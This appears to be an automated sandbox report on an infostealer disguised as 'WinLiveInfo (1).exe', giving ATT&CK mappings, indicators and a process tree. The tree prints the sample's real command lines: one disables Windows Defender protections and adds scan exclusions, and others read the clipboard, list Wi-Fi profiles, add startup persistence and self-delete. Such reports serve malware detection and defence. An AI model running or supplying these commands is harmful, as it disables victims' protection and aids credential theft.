06f6595b8642674f097dd5962f01a17b775a194fc28e4d7163c8ada15deaa47a

Analysis

max time kernel
105s
max time network
139s
platform
windows10-2004_x64
resource
win10v2004-20250313-en
resource tags

arch:x64arch:x86image:win10v2004-20250313-enlocale:en-usos:windows10-2004-x64system
submitted
28/03/2025, 17:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

WinLiveInfo (1).exe
Size

20.8MB
MD5

8b4bd3821cab86b9c961b0481a064cfc
SHA1

1caf1ba2fe2c8f15a9d4392b4839a0f7b643aaaf
SHA256

06f6595b8642674f097dd5962f01a17b775a194fc28e4d7163c8ada15deaa47a
SHA512

ea3d6c02a520f4afa91d18c2aeaf8553e5db6927747c078c546422f234cc453eb522de33fec7a83e97bbba72093e268bf1f3aaa16ded5e3be5256742e9b2d055
SSDEEP

393216:wh9S6Ac+TGz7kMIEZhgYBvWg1WPbBzM/wH:a9H97lBBvWg1sbhf

Score

8^/10

collection discovery execution persistence privilege_escalation spyware stealer upx

Malware Config

Signatures

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
3164	powershell.exe
4540	powershell.exe
1672	powershell.exe
1292	powershell.exe

Clipboard Data 1 TTPs 2 IoCs

Adversaries may collect data stored in the clipboard from users copying information within or between applications.

collection

Clipboard Data

T1115

pid	Process
5924	cmd.exe
412	powershell.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinLiveInfo (1).exe	WinLiveInfo (1).exe

Loads dropped DLL 46 IoCs

pid	Process
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
23	raw.githubusercontent.com
24	raw.githubusercontent.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
17	api.ipify.org
18	api.ipify.org
44	api.ipify.org

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/files/0x000700000002423a-195.dat	upx
behavioral2/memory/5892-198-0x00007FFED4B20000-0x00007FFED51E5000-memory.dmp	upx
behavioral2/files/0x0007000000024212-205.dat	upx
behavioral2/memory/5892-207-0x00007FFEE7930000-0x00007FFEE7955000-memory.dmp	upx
behavioral2/files/0x0007000000024234-208.dat	upx
behavioral2/memory/5892-209-0x00007FFEED940000-0x00007FFEED94F000-memory.dmp	upx
behavioral2/files/0x0007000000024210-210.dat	upx
behavioral2/memory/5892-213-0x00007FFEE97F0000-0x00007FFEE980A000-memory.dmp	upx
behavioral2/files/0x0007000000024215-212.dat	upx
behavioral2/files/0x0007000000024233-215.dat	upx
behavioral2/files/0x000700000002421d-233.dat	upx
behavioral2/files/0x0007000000024219-229.dat	upx
behavioral2/memory/5892-240-0x00007FFEE8ED0000-0x00007FFEE8EDF000-memory.dmp	upx
behavioral2/files/0x0007000000024238-242.dat	upx
behavioral2/files/0x0007000000024218-244.dat	upx
behavioral2/files/0x0007000000024214-246.dat	upx
behavioral2/memory/5892-245-0x00007FFEE7860000-0x00007FFEE786D000-memory.dmp	upx
behavioral2/memory/5892-251-0x00007FFEE7930000-0x00007FFEE7955000-memory.dmp	upx
behavioral2/memory/5892-250-0x00007FFED45E0000-0x00007FFED4B13000-memory.dmp	upx
behavioral2/memory/5892-249-0x00007FFEE7840000-0x00007FFEE7854000-memory.dmp	upx
behavioral2/memory/5892-248-0x00007FFED4B20000-0x00007FFED51E5000-memory.dmp	upx
behavioral2/memory/5892-243-0x00007FFEE4660000-0x00007FFEE4696000-memory.dmp	upx
behavioral2/memory/5892-238-0x00007FFEE8EE0000-0x00007FFEE8EED000-memory.dmp	upx
behavioral2/files/0x000700000002423d-237.dat	upx
behavioral2/memory/5892-236-0x00007FFEE96E0000-0x00007FFEE96F9000-memory.dmp	upx
behavioral2/memory/5892-234-0x00007FFEE7900000-0x00007FFEE792D000-memory.dmp	upx
behavioral2/files/0x000700000002421b-231.dat	upx
behavioral2/files/0x000700000002421a-230.dat	upx
behavioral2/files/0x0007000000024217-227.dat	upx
behavioral2/files/0x0007000000024216-226.dat	upx
behavioral2/files/0x0007000000024213-224.dat	upx
behavioral2/files/0x0007000000024211-223.dat	upx
behavioral2/files/0x000700000002420f-222.dat	upx
behavioral2/files/0x00070000000242c6-220.dat	upx
behavioral2/files/0x00070000000242bd-219.dat	upx
behavioral2/files/0x0007000000024235-216.dat	upx
behavioral2/memory/5892-255-0x00007FFEE4270000-0x00007FFEE433E000-memory.dmp	upx
behavioral2/memory/5892-253-0x00007FFEE4580000-0x00007FFEE45B3000-memory.dmp	upx
behavioral2/files/0x0007000000024237-262.dat	upx
behavioral2/memory/5892-263-0x00007FFEE4420000-0x00007FFEE4438000-memory.dmp	upx
behavioral2/memory/5892-260-0x00007FFED5490000-0x00007FFED560F000-memory.dmp	upx
behavioral2/memory/5892-259-0x00007FFEE4630000-0x00007FFEE4654000-memory.dmp	upx
behavioral2/files/0x0007000000024223-264.dat	upx
behavioral2/memory/5892-268-0x00007FFEE41D0000-0x00007FFEE41DB000-memory.dmp	upx
behavioral2/files/0x0007000000024224-269.dat	upx
behavioral2/memory/5892-267-0x00007FFEE8ED0000-0x00007FFEE8EDF000-memory.dmp	upx
behavioral2/memory/5892-270-0x00007FFEE4070000-0x00007FFEE4097000-memory.dmp	upx
behavioral2/memory/5892-273-0x00007FFED51F0000-0x00007FFED530A000-memory.dmp	upx
behavioral2/files/0x00070000000241e7-274.dat	upx
behavioral2/files/0x00070000000241e2-276.dat	upx
behavioral2/memory/5892-291-0x00007FFEE4580000-0x00007FFEE45B3000-memory.dmp	upx
behavioral2/memory/5892-290-0x00007FFEE1E60000-0x00007FFEE1E6C000-memory.dmp	upx
behavioral2/memory/5892-289-0x00007FFEDB540000-0x00007FFEDB54C000-memory.dmp	upx
behavioral2/memory/5892-288-0x00007FFEDB550000-0x00007FFEDB55B000-memory.dmp	upx
behavioral2/memory/5892-296-0x00007FFED5AF0000-0x00007FFED5AFC000-memory.dmp	upx
behavioral2/memory/5892-302-0x00007FFED5A10000-0x00007FFED5A1D000-memory.dmp	upx
behavioral2/memory/5892-303-0x00007FFED59F0000-0x00007FFED5A02000-memory.dmp	upx
behavioral2/memory/5892-305-0x00007FFED3E20000-0x00007FFED3E2C000-memory.dmp	upx
behavioral2/memory/5892-304-0x00007FFEE4070000-0x00007FFEE4097000-memory.dmp	upx
behavioral2/memory/5892-306-0x00007FFED3BD0000-0x00007FFED3E19000-memory.dmp	upx
behavioral2/memory/5892-301-0x00007FFED5A20000-0x00007FFED5A2C000-memory.dmp	upx
behavioral2/memory/5892-300-0x00007FFED5A30000-0x00007FFED5A3C000-memory.dmp	upx
behavioral2/memory/5892-299-0x00007FFED5AD0000-0x00007FFED5ADB000-memory.dmp	upx
behavioral2/memory/5892-298-0x00007FFED5AE0000-0x00007FFED5AEB000-memory.dmp	upx

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
428	cmd.exe
3136	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
3204	cmd.exe
2216	netsh.exe

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5072	WMIC.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3136	PING.EXE

Suspicious behavior: EnumeratesProcesses 22 IoCs

pid	Process
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
412	powershell.exe
412	powershell.exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
5892	WinLiveInfo (1).exe
3164	powershell.exe
3164	powershell.exe
1672	powershell.exe
1672	powershell.exe
1292	powershell.exe
1292	powershell.exe
4540	powershell.exe
4540	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	5892	WinLiveInfo (1).exe
Token: SeIncreaseQuotaPrivilege	4548	WMIC.exe
Token: SeSecurityPrivilege	4548	WMIC.exe
Token: SeTakeOwnershipPrivilege	4548	WMIC.exe
Token: SeLoadDriverPrivilege	4548	WMIC.exe
Token: SeSystemProfilePrivilege	4548	WMIC.exe
Token: SeSystemtimePrivilege	4548	WMIC.exe
Token: SeProfSingleProcessPrivilege	4548	WMIC.exe
Token: SeIncBasePriorityPrivilege	4548	WMIC.exe
Token: SeCreatePagefilePrivilege	4548	WMIC.exe
Token: SeBackupPrivilege	4548	WMIC.exe
Token: SeRestorePrivilege	4548	WMIC.exe
Token: SeShutdownPrivilege	4548	WMIC.exe
Token: SeDebugPrivilege	4548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4548	WMIC.exe
Token: SeRemoteShutdownPrivilege	4548	WMIC.exe
Token: SeUndockPrivilege	4548	WMIC.exe
Token: SeManageVolumePrivilege	4548	WMIC.exe
Token: 33	4548	WMIC.exe
Token: 34	4548	WMIC.exe
Token: 35	4548	WMIC.exe
Token: 36	4548	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4548	WMIC.exe
Token: SeSecurityPrivilege	4548	WMIC.exe
Token: SeTakeOwnershipPrivilege	4548	WMIC.exe
Token: SeLoadDriverPrivilege	4548	WMIC.exe
Token: SeSystemProfilePrivilege	4548	WMIC.exe
Token: SeSystemtimePrivilege	4548	WMIC.exe
Token: SeProfSingleProcessPrivilege	4548	WMIC.exe
Token: SeIncBasePriorityPrivilege	4548	WMIC.exe
Token: SeCreatePagefilePrivilege	4548	WMIC.exe
Token: SeBackupPrivilege	4548	WMIC.exe
Token: SeRestorePrivilege	4548	WMIC.exe
Token: SeShutdownPrivilege	4548	WMIC.exe
Token: SeDebugPrivilege	4548	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4548	WMIC.exe
Token: SeRemoteShutdownPrivilege	4548	WMIC.exe
Token: SeUndockPrivilege	4548	WMIC.exe
Token: SeManageVolumePrivilege	4548	WMIC.exe
Token: 33	4548	WMIC.exe
Token: 34	4548	WMIC.exe
Token: 35	4548	WMIC.exe
Token: 36	4548	WMIC.exe
Token: SeDebugPrivilege	412	powershell.exe
Token: SeDebugPrivilege	3164	powershell.exe
Token: SeDebugPrivilege	1672	powershell.exe
Token: SeDebugPrivilege	1292	powershell.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeIncreaseQuotaPrivilege	4988	WMIC.exe
Token: SeSecurityPrivilege	4988	WMIC.exe
Token: SeTakeOwnershipPrivilege	4988	WMIC.exe
Token: SeLoadDriverPrivilege	4988	WMIC.exe
Token: SeSystemProfilePrivilege	4988	WMIC.exe
Token: SeSystemtimePrivilege	4988	WMIC.exe
Token: SeProfSingleProcessPrivilege	4988	WMIC.exe
Token: SeIncBasePriorityPrivilege	4988	WMIC.exe
Token: SeCreatePagefilePrivilege	4988	WMIC.exe
Token: SeBackupPrivilege	4988	WMIC.exe
Token: SeRestorePrivilege	4988	WMIC.exe
Token: SeShutdownPrivilege	4988	WMIC.exe
Token: SeDebugPrivilege	4988	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4988	WMIC.exe
Token: SeRemoteShutdownPrivilege	4988	WMIC.exe
Token: SeUndockPrivilege	4988	WMIC.exe

Suspicious use of WriteProcessMemory 46 IoCs

description	pid	Process	procid_target
PID 1184 wrote to memory of 5892	1184	WinLiveInfo (1).exe	86
PID 1184 wrote to memory of 5892	1184	WinLiveInfo (1).exe	86
PID 5892 wrote to memory of 4312	5892	WinLiveInfo (1).exe	89
PID 5892 wrote to memory of 4312	5892	WinLiveInfo (1).exe	89
PID 4312 wrote to memory of 4548	4312	cmd.exe	91
PID 4312 wrote to memory of 4548	4312	cmd.exe	91
PID 5892 wrote to memory of 3204	5892	WinLiveInfo (1).exe	93
PID 5892 wrote to memory of 3204	5892	WinLiveInfo (1).exe	93
PID 5892 wrote to memory of 5924	5892	WinLiveInfo (1).exe	95
PID 5892 wrote to memory of 5924	5892	WinLiveInfo (1).exe	95
PID 3204 wrote to memory of 2216	3204	cmd.exe	96
PID 3204 wrote to memory of 2216	3204	cmd.exe	96
PID 5924 wrote to memory of 412	5924	cmd.exe	98
PID 5924 wrote to memory of 412	5924	cmd.exe	98
PID 5892 wrote to memory of 2020	5892	WinLiveInfo (1).exe	100
PID 5892 wrote to memory of 2020	5892	WinLiveInfo (1).exe	100
PID 2020 wrote to memory of 3164	2020	cmd.exe	102
PID 2020 wrote to memory of 3164	2020	cmd.exe	102
PID 2020 wrote to memory of 1672	2020	cmd.exe	103
PID 2020 wrote to memory of 1672	2020	cmd.exe	103
PID 2020 wrote to memory of 1292	2020	cmd.exe	106
PID 2020 wrote to memory of 1292	2020	cmd.exe	106
PID 2020 wrote to memory of 4540	2020	cmd.exe	107
PID 2020 wrote to memory of 4540	2020	cmd.exe	107
PID 5892 wrote to memory of 4888	5892	WinLiveInfo (1).exe	114
PID 5892 wrote to memory of 4888	5892	WinLiveInfo (1).exe	114
PID 4888 wrote to memory of 4988	4888	cmd.exe	116
PID 4888 wrote to memory of 4988	4888	cmd.exe	116
PID 5892 wrote to memory of 4952	5892	WinLiveInfo (1).exe	117
PID 5892 wrote to memory of 4952	5892	WinLiveInfo (1).exe	117
PID 5892 wrote to memory of 2044	5892	WinLiveInfo (1).exe	119
PID 5892 wrote to memory of 2044	5892	WinLiveInfo (1).exe	119
PID 2044 wrote to memory of 5072	2044	cmd.exe	122
PID 2044 wrote to memory of 5072	2044	cmd.exe	122
PID 5892 wrote to memory of 5092	5892	WinLiveInfo (1).exe	123
PID 5892 wrote to memory of 5092	5892	WinLiveInfo (1).exe	123
PID 5092 wrote to memory of 4444	5092	cmd.exe	125
PID 5092 wrote to memory of 4444	5092	cmd.exe	125
PID 5892 wrote to memory of 4564	5892	WinLiveInfo (1).exe	126
PID 5892 wrote to memory of 4564	5892	WinLiveInfo (1).exe	126
PID 4564 wrote to memory of 2000	4564	cmd.exe	128
PID 4564 wrote to memory of 2000	4564	cmd.exe	128
PID 5892 wrote to memory of 428	5892	WinLiveInfo (1).exe	129
PID 5892 wrote to memory of 428	5892	WinLiveInfo (1).exe	129
PID 428 wrote to memory of 3136	428	cmd.exe	131
PID 428 wrote to memory of 3136	428	cmd.exe	131

C:\Users\Admin\AppData\Local\Temp\WinLiveInfo (1).exe
"C:\Users\Admin\AppData\Local\Temp\WinLiveInfo (1).exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1184
- C:\Users\Admin\AppData\Local\Temp\WinLiveInfo (1).exe
  "C:\Users\Admin\AppData\Local\Temp\WinLiveInfo (1).exe"
  2⤵
  - Drops startup file
  - Loads dropped DLL
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:5892
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4312
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4548
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
    3⤵
    - System Network Configuration Discovery: Wi-Fi Discovery
    - Suspicious use of WriteProcessMemory
    PID:3204
  - - C:\Windows\system32\netsh.exe
      netsh wlan show profiles
      4⤵
      Event Triggered Execution: Netsh Helper DLL
      System Network Configuration Discovery: Wi-Fi Discovery
      PID:2216
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
    3⤵
    - Clipboard Data
    - Suspicious use of WriteProcessMemory
    PID:5924
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-Clipboard
      4⤵
      Clipboard Data
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:412
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\AppData" & powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath %USERPROFILE%\Local" & powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2020
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\AppData"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath C:\Users\Admin\Local"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1292
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -command "Set-MpPreference -ExclusionExtension '.exe'"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4540
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4888
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4988
- - C:\Windows\System32\Wbem\wmic.exe
    wmic cpu get Name
    3⤵
    PID:4952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:5072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:5092
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:4444
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4564
  - - C:\Windows\System32\wbem\WMIC.exe
      C:\\Windows\\System32\\wbem\\WMIC.exe csproduct get uuid
      4⤵
      PID:2000
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /F "C:\Users\Admin\AppData\Local\Temp\WinLiveInfo (1).exe""
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:428
  - - C:\Windows\system32\PING.EXE
      ping localhost -n 3
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3136

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Remote System Discovery

T1018

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\TW978ZtgP1\Browser\cc's.txt

Filesize
91B

MD5
5aa796b6950a92a226cc5c98ed1c47e8

SHA1
6706a4082fc2c141272122f1ca424a446506c44d

SHA256
c4c83da3a904a4e7114f9bd46790db502cdd04800e684accb991cd1a08ee151c

SHA512
976f403257671e8f652bf988f4047202e1a0fd368fdb2bab2e79ece1c20c7eb775c4b3a8853c223d4f750f4192cd09455ff024918276dc1dd1442fa3b36623ad

Download Submit
C:\Users\Admin\AppData\Local\Temp\TW978ZtgP1\Browser\history.txt

Filesize
23B

MD5
5638715e9aaa8d3f45999ec395e18e77

SHA1
4e3dc4a1123edddf06d92575a033b42a662fe4ad

SHA256
4db7f6559c454d34d9c2d557524603c3f52649c2d69b26b6e8384a3d179aeae6

SHA512
78c96efab1d941e34d3137eae32cef041e2db5b0ebbf883e6a2effa79a323f66e00cfb7c45eb3398b3cbd0469a2be513c3ff63e5622261857eefc1685f77f76b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\Cryptodome\Cipher\_raw_cbc.pyd

Filesize
10KB

MD5
e0dd54d1a4a8b3f4a2b7fb67bc2e6297

SHA1
b184c2ed3dd46d527df992ffe0c57ef8eb364eea

SHA256
b6b7cce003744af2342afef0f2536cdbbccd3a271f15f72aefc740332312281e

SHA512
960f3e6e3a6168ba65d690cb9c94541de8f5a8afb456b5db8d7c0392d0d935cf47245eb88160606be12d54c32f1dc1e1ebf7c6049a310654847e0d473d1726a6

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\Cryptodome\Cipher\_raw_cfb.pyd

Filesize
10KB

MD5
534fc55a686a5e2993b5f0f55de816b6

SHA1
b4f4d659ed48e7a0ebee924c46df981351bf5ccd

SHA256
65f991b7e0831110acb0556d5fbe2054a9ea696a7f4b373d86cd21d7c9c60b78

SHA512
fec49bcf30ed50fe652cbdaf33c3a8cde430fdc04d86b078f9a69ac9be0f5fdc5a81420bc713ca9275e622a49040b1413a5789b3d2675941ed88cfb33e1e7ec1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\Cryptodome\Cipher\_raw_ecb.pyd

Filesize
9KB

MD5
1a48e6e2a3243a0e38996e61f9f61a68

SHA1
488a1aa38cd3c068bdf24b96234a12232007616c

SHA256
c7b01a0290bc43910ee776bd90de05e37b77f5bd33feaf7d38f4c362e255e061

SHA512
d7acd779b7cab5577289511f137dc664966fcaac39748e33ca4d266a785b17766106944df21c8f2452fd28e008529f3e0097282ad3c69f1069a93df25c6da764

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\Cryptodome\Cipher\_raw_ofb.pyd

Filesize
10KB

MD5
809c778ab43526125360d64074cd21e0

SHA1
c8d76cb472b408399ecc47acb1346e2dbc6ff264

SHA256
a4f4451384b7cf09de3d8ff262d4f54f6ef2b078c0daa54c725c0341a2f94797

SHA512
14240ebecb8cbde9c83d9c0b50d9506bc3d32553ddcf1db9bb8aeae70ffc09e20f73859274de57876d7adbf894c1f54665d8439b53e64ce3ef0aebe7c98b878d

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\VCRUNTIME140.dll

Filesize
116KB

MD5
be8dbe2dc77ebe7f88f910c61aec691a

SHA1
a19f08bb2b1c1de5bb61daf9f2304531321e0e40

SHA256
4d292623516f65c80482081e62d5dadb759dc16e851de5db24c3cbb57b87db83

SHA512
0da644472b374f1da449a06623983d0477405b5229e386accadb154b43b8b083ee89f07c3f04d2c0c7501ead99ad95aecaa5873ff34c5eeb833285b598d5a655

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\VCRUNTIME140_1.dll

Filesize
48KB

MD5
f8dfa78045620cf8a732e67d1b1eb53d

SHA1
ff9a604d8c99405bfdbbf4295825d3fcbc792704

SHA256
a113f192195f245f17389e6ecbed8005990bcb2476ddad33f7c4c6c86327afe5

SHA512
ba7f8b7ab0deb7a7113124c28092b543e216ca08d1cf158d9f40a326fb69f4a2511a41a59ea8482a10c9ec4ec8ac69b70dfe9ca65e525097d93b819d498da371

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\_asyncio.pyd

Filesize
38KB

MD5
b55a1c060f7ba3abd08100d3753ddc44

SHA1
880af54ef46fbc94ec31789aef6085cd866f0e7f

SHA256
10a5929a4d1fd3b9258df4acdffb5627f8873cd10f15fc2cc2844160d7497896

SHA512
6eec90dc29d6ff73cdac15369f8979c4551c8dbe2d08f263171ed8c47087d5984c09dcada303c6d76021ee2bb2e60d2f61d5c628c693af23f6daa0ab2a009ccf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\_bz2.pyd

Filesize
48KB

MD5
9a31382d512efb1821f0bf544e39f63d

SHA1
f4cdf56c8aee2de5e93f35b9af94c3bedc87c8c5

SHA256
d08484e6fae8cf270aa522c5e6ad1ce4ed89a3e4da754ab936ee6463ec87bfd9

SHA512
ee675a883c4e9be4e1fdb37893827240c3d88956dedc6be7ec673e2b4e70061d7af9fcf1ad1b885c707ee0ca597076ec4a4b22f4a43fc6bcbab58653ba12ff91

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\_cffi_backend.cp312-win_amd64.pyd

Filesize
71KB

MD5
fccc127e4d5324f5527ff4e0a0f96f09

SHA1
dc46acc17af46bbf90de250b5bce828ea7402e03

SHA256
43482f0fa3d4225bc4dd05dd58ad6a74aa74febfacd832dcc9637ca6316ec226

SHA512
0380703b25f277ce842817003bd6226bdc5effb36c692f0df524dbc517b76a6b667c3f00f67bcc5fe2364e9b6bba8983e584eed2b03c95ff4fa3652ed6859efd

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI11842\_ctypes.pyd

Filesize
59KB

MD5
c1d7077eae2f0c7c1d1c3af08a17ace5

SHA1
5d3bad54187fb2b1f6cedf4795e9fb76e93b4b50

SHA256
b15f848d3690da8f95c52742047c9edac06b9a4061c089cf47bc7f9880702189

SHA512
